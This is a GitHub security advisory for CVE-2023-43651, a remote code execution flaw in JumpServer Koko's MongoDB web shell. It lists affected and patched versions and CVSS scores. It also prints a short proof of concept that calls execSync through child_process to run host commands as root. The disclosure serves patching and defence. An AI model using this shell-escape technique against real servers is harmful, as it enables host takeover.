Skip to content

Jumpserver Koko vulnerable to remote code execution on the host system via MongoDB shell

Moderate severity GitHub Reviewed Published Sep 26, 2023 in jumpserver/jumpserver • Updated Nov 11, 2023

Package

gomod github.com/jumpserver/koko (Go)

Affected versions

>= 2.0.0, < 2.28.20
>= 3.0.0, < 3.7.1

Patched versions

2.28.20
3.7.1

Description

Impact

An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system.

Details

Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands.

admin> const { execSync } = require("child_process")
admin> console.log(execSync("id; hostname;").toString())
uid=0(root) gid=0(root) groups=0(root)
jms_koko
admin> 

Patches

Safe versions:

  • v2.28.20
  • v3.7.1

Workarounds

It is recommended to upgrade the safe versions.

After upgrade, you can use the same method to check whether the vulnerability is fixed.

admin> console.log(execSync("id; hostname;").toString())
/bin/sh: line 1: /bin/hostname: Permission denied

References

Thanks for Oskar Zeino-Mahmalat of Sonar found and report this vulnerability

References

@ibuler ibuler published to jumpserver/jumpserver Sep 26, 2023
Published by the National Vulnerability Database Sep 27, 2023
Published to the GitHub Advisory Database Oct 24, 2023
Reviewed Oct 24, 2023
Last updated Nov 11, 2023

Severity

Moderate
6.4
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
High
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H

Weaknesses

CVE ID

CVE-2023-43651

GHSA ID

GHSA-4r5x-x283-wm96

Source code

Checking history
See something to contribute? Suggest improvements for this vulnerability.